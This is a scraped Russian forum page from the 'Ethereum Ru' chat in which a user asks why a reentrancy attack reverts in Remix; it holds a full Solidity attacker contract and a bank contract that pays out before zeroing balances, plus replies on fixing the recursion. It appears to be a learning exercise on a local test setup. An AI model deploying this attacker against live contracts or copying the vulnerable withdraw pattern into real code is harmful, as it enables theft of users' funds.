209 похожих чатов

Комьюнити Binance Комьюнити Binance
Binance English Binance English
WazirX Discuss WazirX Discuss
Baby Doge Coin Baby Doge Coin
PancakeSwap PancakeSwap
HTX English HTX English
HEX.COM HEX.COM
Ecomi Ecomi
MultiversX - Community MultiversX - Community
Terra Classic - $LUNC Terra Classic - $LUNC
Alien Worlds - Official Alien Worlds - Official
Moonbeam & Moonriver Offi... Moonbeam & Moonriver Offi...
Gate.io International (En... Gate.io International (En...
Kadena Official Telegram Kadena Official Telegram
MOBOX MOBOX
COTI - Currency of the In... COTI - Currency of the In...
FTX - Built By Traders, F... FTX - Built By Traders, F...
Solana Solana
Frax Finance Frax Finance
Nexo Community Nexo Community
Oasis Network Community Oasis Network Community
Sonic Marines Sonic Marines
WAGMI: Chainlink Communit... WAGMI: Chainlink Communit...
Velas Community Velas Community
Kava Official Kava Official
Casper Casper
TRON OFFICIAL MAIN GROUP TRON OFFICIAL MAIN GROUP
[Official] The Sandbox [Official] The Sandbox
Nexera Nexera
Ergo Platform Ergo Platform
Polygon Official Communit... Polygon Official Communit...
Telos Community Telos Community
Monero XMR Monero XMR
Trust Wallet English Trust Wallet English
Axie Infinity (RU) Axie Infinity (RU)
Star Atlas - Real Officia... Star Atlas - Real Officia...
BitTorrent BTT BitTorrent BTT
Ethereum Ru Ethereum Ru
Cosmos Network ~ $ATOM Cosmos Network ~ $ATOM
Reef Global Community Reef Global Community
Raydium Protocol Raydium Protocol
My Neighbor Alice: NFT + ... My Neighbor Alice: NFT + ...
Boba Network Official Boba Network Official
IoTeX Official Group IoTeX Official Group
Venus Protocol Venus Protocol
Litecoin Litecoin
Energy Web Energy Web
Constellation Network Constellation Network
LGCY Network LGCY Network
DeFiChain - International DeFiChain - International
Anchor Protocol Anchor Protocol
Pirate Chain Official (NO... Pirate Chain Official (NO...
Orion Community Orion Community
Ocean Protocol 🌊 Ocean Protocol 🌊
Bitcoin Cash (BCH) Bitcoin Cash (BCH)
Ripple - XRP Ripple - XRP
Injective Injective
Illuvium Official Chat Illuvium Official Chat
Mdex English Mdex English
Celer Network - English Celer Network - English
Ultra Discussions Ultra Discussions
SingularityNET Community SingularityNET Community
Zilliqa Official Chat Zilliqa Official Chat
Chiliz/Socios.com ($CHZ) ... Chiliz/Socios.com ($CHZ) ...
Algorand Algorand
Avalanche (AVAX) - Offici... Avalanche (AVAX) - Offici...
Nervos Network Nervos Network
Helium Helium
Mina Protocol Mina Protocol
EOS EOS
Amp Community Amp Community
FUNToken Ecosystem Chat FUNToken Ecosystem Chat
Synternet Synternet
Swipe Swipe
Fetch.ai Fetch.ai
VechainOfficial - VET & V... VechainOfficial - VET & V...
Waves Official 🌊 Waves Official 🌊
NestJS — русскоязычное со... NestJS — русскоязычное со...
1inch Network [EN] 1inch Network [EN]
Reserve Protocol Reserve Protocol
Sentinel dVPN - Contribut... Sentinel dVPN - Contribut...
BakerySwap BakerySwap
Bancor Protocol Bancor Protocol
Alchemy Pay Official Alchemy Pay Official
Origin Protocol Origin Protocol
Axie Infinity Axie Infinity
Celo - Official Celo - Official
Neutrino Protocol - Offic... Neutrino Protocol - Offic...
Hedera Community Chat ($H... Hedera Community Chat ($H...
Bonfida Bonfida
Ellipsis Finance Communit... Ellipsis Finance Communit...
WOO Community WOO Community
Everscale RU Community Everscale RU Community
Kyber Network Official Kyber Network Official
The Codeby The Codeby
Yield Guild Games Officia... Yield Guild Games Officia...
Akash Network Akash Network
Neo Smart Economy (Offici... Neo Smart Economy (Offici...
Astar (prev Plasm) & Shid... Astar (prev Plasm) & Shid...
XDB Chain Superchannel (t... XDB Chain Superchannel (t...
Chainlink Official Chainlink Official
Zcash Community 🛡ᙇ Zcash Community 🛡ᙇ
BNB Chain Community BNB Chain Community
Cardano Official Cardano Official
IDEX Official Community C... IDEX Official Community C...
Prom Chat Prom Chat
Linear Exchange Community Linear Exchange Community
TokoToken (TKO) Discussio... TokoToken (TKO) Discussio...
Phala Network Official - ... Phala Network Official - ...
Lido Lido
BitDAO BitDAO
SwissBorg SwissBorg
Ontology English Ontology English
Cartesi Official Communit... Cartesi Official Communit...
LUKSO Blockchain | LYX LUKSO Blockchain | LYX
Syscoin Official Syscoin Official
Conflux English Conflux English
Pundi X Official | Englis... Pundi X Official | Englis...
SunPump Official Communit... SunPump Official Communit...
Persistence One Community... Persistence One Community...
TRON DAO Russia TRON DAO Russia
DENT/DENTX - OFFICIAL DENT/DENTX - OFFICIAL
🐕 $ASS: Australian Safe S... 🐕 $ASS: Australian Safe S...
Mirror Protocol Mirror Protocol
Chia Network RU (unoffici... Chia Network RU (unoffici...
WINkLink Official WINkLink Official
Pro Windows Pro Windows
Ravencoin Ravencoin
DigiByte Discussion DigiByte Discussion
Holo Holo
Flow CIS Community Flow CIS Community
SKALE SKALE
BSV Enterprise Utility Bl... BSV Enterprise Utility Bl...
Ankr Community Ankr Community
Electroneum Electroneum
Quant Community Channel Quant Community Channel
The Graph Official Commun... The Graph Official Commun...
Everscale Community Everscale Community
iExec RLC Official Discus... iExec RLC Official Discus...
Unibright Official Commun... Unibright Official Commun...
Telcoin Community Telcoin Community
yearn.finance (YFI) yearn.finance (YFI)
Shiba Inu: The Dogecoin K... Shiba Inu: The Dogecoin K...
Power Query ru Power Query ru
Tezos Tezos
Nano (XNO) Official Engli... Nano (XNO) Official Engli...
Band Protocol Band Protocol
Coin98 Super Wallet - Cha... Coin98 Super Wallet - Cha...
IOST Community IOST Community
Viction Community Chat Viction Community Chat
PolkadotRu PolkadotRu
Metal DAO | $MTL Metal DAO | $MTL
ICON Project (Official - ... ICON Project (Official - ...
Flow Community [unofficia... Flow Community [unofficia...
BTCST Community BTCST Community
Verge Currency Verge Currency
NKN Official NKN Official
Яндекс Диалоги (сообществ... Яндекс Диалоги (сообществ...
Dogecoin Dogecoin
Hive.io Hive.io
Aave Fam | NOT Airdroppin... Aave Fam | NOT Airdroppin...
Dash Dash
Audius Official 🎧 Audius Official 🎧
DeChat — TON, Ethereum & ... DeChat — TON, Ethereum & ...
Agile, Scrum, Lean, Kanba... Agile, Scrum, Lean, Kanba...
Automata Network Automata Network
TitanSwap TitanSwap
Loopring English Communit... Loopring English Communit...
Project Serum Project Serum
Basic Attention Token Basic Attention Token
Perpetual Protocol Perpetual Protocol
Stella XYZ Stella XYZ
Polymath Polymath
IOTA Tech IOTA Tech
PEAKDEFI Official PEAKDEFI Official
aelf (ELF) Community aelf (ELF) Community
Mask Network Mask Network
Decred (DCR) Decred (DCR)
RU.CRYPTOGRAPHY — Криптог... RU.CRYPTOGRAPHY — Криптог...
Threshold ✜ Network Chat Threshold ✜ Network Chat
Ethereum Classic ETC Ethereum Classic ETC
Bifrost & BiFi Global 🌏 Bifrost & BiFi Global 🌏
Ren Ren
Waves Community (Ru) 🌊 Waves Community (Ru) 🌊
Orchid Official Community Orchid Official Community
Convex Finance - Chat Convex Finance - Chat
eCash ( XEC ) English eCash ( XEC ) English
PlayDapp Official Communi... PlayDapp Official Communi...
Stellar Lumens XLM/STR Stellar Lumens XLM/STR
Bitcoin Diamond Bitcoin Diamond
bt[c]hat - крипто чат #1 bt[c]hat - крипто чат #1
Terra Luna classic Terra Luna classic
StormX Official Channel StormX Official Channel
ru_nexus_sonatype ru_nexus_sonatype
Aragon 🦅 Aragon 🦅
Stratis Platform Stratis Platform
Filecoin Filecoin
Autonomi Autonomi
Bitcoin Gold Official - G... Bitcoin Gold Official - G...
Dawn Protocol [FirstBlood... Dawn Protocol [FirstBlood...
Whitecoin| Official Teleg... Whitecoin| Official Teleg...
NEM Official (Symbol & NI... NEM Official (Symbol & NI...
Ardor Community Ardor Community
Welcome to the Aave unoff... Welcome to the Aave unoff...
NEAR Protocol Official NEAR Protocol Official
SafeMoon SafeMoon
Theta Network Theta Network
Horizen (formerly ZenCash... Horizen (formerly ZenCash...
Golem Network Discussion ... Golem Network Discussion ...
Ethereum Ru Ethereum Ru
Ваня-

Привет, пытаюсь сделать reentering attack в remix контракт атакера: // SPDX-License-Identifier: GPL-3.0 pragma

solidity >=0.7.0 <0.9.0;
import "hardhat/console.sol";

interface IEthBank {
function deposit() external payable;
function withdrow() external;
}

contract Attacker {
IEthBank public immutable bank;
address public owner;

modifier onlyOwner() {
console.log("sender");
console.log(msg.sender);
console.log("owner");
console.log(owner);
require(msg.sender == owner, "only owner can call this function");
_;
}

constructor(address addressToAttack) {
bank = IEthBank(addressToAttack);
owner = msg.sender;
}

function attack() external payable onlyOwner {
bank.deposit{value: msg.value}();
bank.withdrow();
}

receive() external payable {
console.log("recieve()");
if(address(bank).balance > 0) {
console.log("reentering");
bank.withdrow();
} else {
payable(owner).transfer(address(this).balance);
}
}
}
контракт банка:
// SPDX-License-Identifier: GPL-3.0

pragma solidity >=0.7.0 <0.9.0;
import "hardhat/console.sol";

contract Ethbank {
address owner;
mapping (address => uint256) public balances;

constructor() {
owner = msg.sender;
}

modifier onlyOwner() {
require(msg.sender == owner, "only owner can call this contract function");
_;
}

function deposit() external payable {
balances[msg.sender] += msg.value;
}

function withdrow() external {
require(balances[msg.sender] > 0, "no money on sender");

console.log("================== balance");
console.log(address(this).balance);
payable(msg.sender).transfer(balances[msg.sender]);
balances[msg.sender] = 0;
}

function getCurrentBalance() external view returns (uint) {
return address(this).balance;
}

function getAddress() external view returns (address) {
return address(this);
}
}
выводит такое сообщение:
логи:
 sender
 0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2
 owner
 0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2
 ================== balance
 73000000000000000000
 recieve()
 reentering
ошибка:
transact to Attacker.attack errored: VM error: revert.

revert
The transaction has been reverted to the initial state.
Note: The called function should be payable if you send value and the value you send should be less than your current balance.
Debug the transaction to get more information.
получается при попытке в методе receive вызвать ещё раз bank.withdraw выпадает эта хрень. Почему? В чем косяк?

#cryptocurrency #eth #russian
0

5 ответов

14 просмотров
Vasiliy-Tikhonenko

в консоль.логи можно аргументы через запятую писать. Много не пробовал, но название переменной + саму переменную точно можно объединить в один) withdrAw https://habr.com/ru/post/655639/ тут есть статья про реентрански, ток это перевод статьи 19 года, так что версия солидити не новая. В образовательных целях, наверно проще попробовать воспроизвести реентранси атаку на какой-нибудь ^0.4.0 версии. Синтаксис там будет несколько другой, зато разные дыры точно работают. В коде у вас сейчас написана бесконечная рекурсия, так что даже когда поймете чо за ошибка падает и почему, работать все равно не будет, потому что будет бесконечно входить в виздровал, сожрет весь газ и отвалится по нехватки газа (ну или штатно выйдет украв все деньги, если газа хватит). Лучше переделать просто на один рекурсивный вызов, а не бесконечный. Возможно вы что-то с газом не правильно задаете, или виртуальная машина что-то отптимизирует избыточно. Попробуйте задать или поменять газовый лимит транзакции которую вызываете. На счет 2300 газа, то что писали, это вроде не то, и в ресив функции можно вызывать другие методы (но это не точно, пожтому лучше версию солидити понизить до четвертой, где точно можно было творить бардак и где небыло ресив функции, а была fallback). И библиотеку address.sol из опензеппелинов вы не используете, так что вероятно ссылка скинутая выше вам не пригодится

0
29.04.2022
Ваня- Автор вопроса
Vasiliy Tikhonenko
в консоль.логи можно аргументы через запятую писат...

Я заменил и помогло. Да, в какой-то момент отваливается по газу

0
29.04.2022
Vasiliy-Tikhonenko
Ваня
Я заменил и помогло. Да, в какой-то момент отвалив...

отваливается по газу, потому что у вас не определен выход из рекурсии. Надо в аткующий контракт добавить счетчик, обновлять его при использовании (до вызова виздровал) и в ресиве дописать if в начале, что если счетчик стал больше 1, тогда ничего не делать и просто завершить выполнение функции

0
29.04.2022
Ваня- Автор вопроса
Vasiliy Tikhonenko
отваливается по газу, потому что у вас не определе...

У меня выход, когда все деньги украдены

0
29.04.2022

Похожие вопросы

Ethereum Ru Ethereum Ru / 𓂭𓃇
Подписаться

К сожалению о том что я сказал выше в статье ни слова, соответственно делаю вывод что автор не совсем понимает зачем нужно оптимизировать вычисления по газу в контрактах и как...

#cryptocurrency #eth #russian
15.10.2023
0
17 ответов
Ethereum Ru Ethereum Ru / V L
Подписаться

Ребят, а почему пост PowerPool удалили?

#cryptocurrency #eth #russian
15.11.2023
0
44 ответов
Ethereum Ru Ethereum Ru / 𓂭𓃇
Подписаться

добрый день это ревью статьи которую мне предложил оппонент, как свежую. у меня нет цели принизить или оскорбить, я хотел бы исходить только из своих профессиональных знаний ...

#cryptocurrency #eth #russian
15.10.2023
0
2 ответов
Ethereum Ru Ethereum Ru / Mishka Shishka
Подписаться

function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer f...

#cryptocurrency #eth #russian
30.10.2023
0
10 ответов
Ethereum Ru Ethereum Ru / Даня
Подписаться

Всем привет! Я хотел узнать на сколько разумно арбитражить на ethereum блокчене? На сколько я знаю, тут очень дорогой газ, возможно ли с комиссий эфира арбитражить?😅

#cryptocurrency #eth #russian
13.10.2023
0
26 ответов
Ethereum Ru Ethereum Ru / Ilya
Подписаться

Где и как купить test matic? Краны дают мало, а мне нужно сотни

#cryptocurrency #eth #russian
01.10.2023
0
24 ответов
Ethereum Ru Ethereum Ru / 𓂭𓃇
Подписаться

еще мне интересно сообщество будет ли заинтересовано в методичке с примерами рассчетов над резервами для univ3 через роутер инча? Ну можно и в2 добавить. Я просто заметил что...

#cryptocurrency #eth #russian
12.10.2023
0
16 ответов
Ethereum Ru Ethereum Ru / 𓂭𓃇
Подписаться

опять же нет никаких примеров кода хотя речь идет о его аспектах, поэтому как-то подробно разобрать мысль автора не выдалось. думаю есть кейсы где и копирование может потребов...

#cryptocurrency #eth #russian
15.10.2023
0
1 ответов
Ethereum Ru Ethereum Ru / x616E746F6E
Подписаться

Добрый вечер. Можете ли вы порекомендовать обозреватель блокчейна в веб-формате в стиле etherscan, но для локального блокчейна? У нас есть fork, сделанная с помощью hardhat ...

#cryptocurrency #eth #russian
09.05.2023
0
15 ответов
Ethereum Ru Ethereum Ru / Alexey Vasin
Подписаться

Всем привет, не так давно начал юзать либу web3js, пытаюсь сделать апрув на смарт контракт по свапу токенов, но у меня транза стабильно в чейн не запихивается, вылезает revert...

#cryptocurrency #eth #russian
27.10.2023
0
16 ответов
Смотреть еще
Ethereum Ru Ethereum Ru
Подписаться
Вопросов 6848
Ответов 12624
Участников 3195
Telegram @eth_ru

Обсуждают сегодня

any reference of this implementation?
BitBuddha
29
Ⓐrtto, [4/23/24 7:02 PM] Please explain more fully how it is not working exactly, and what are the steps you are taking, and what error messages come or what happens. Ⓐrtto, ...
Ezza Kezza
2
sounds like people have lost their kaspa on tradeogre... does this mean tradeogre not trustworthy?
Ezza Kezza
15
So much speculation in the last week. So much volatility in price. This is because Hedera has a GC that isn't using the network it's governing. Why aren't people asking why a...
Summit Seeker R
8
Anyone else having this error when trying to make transactions?
Datzel
11
Question: How viable is it to use Anvil as the backend infrastructure for managing a TradFi portfolio, while integrating Flexa for instant liquidity and payment solutions? Cou...
Kevin
2
Ready for some fun AND a chance to win TKO Tokens? Join us for exciting minigames in our Telegram group! 🕒 Don’t miss out—games start on today 25 October 2024, at 8 PM! Ge...
Milkyway | Tokocrypto
255
Heard a news that Jared had a meeting with Elon Musk.. is it true ?
Thomas
15
Hi, is there any exchange accepting Monero without KYC, and offering futures trading?
Hadi
12
Hi, I'm not able to transfer my CBZ coins from trust wallet to Binance wallet. Can you guide how i can do that?
Karam
10
Карта сайта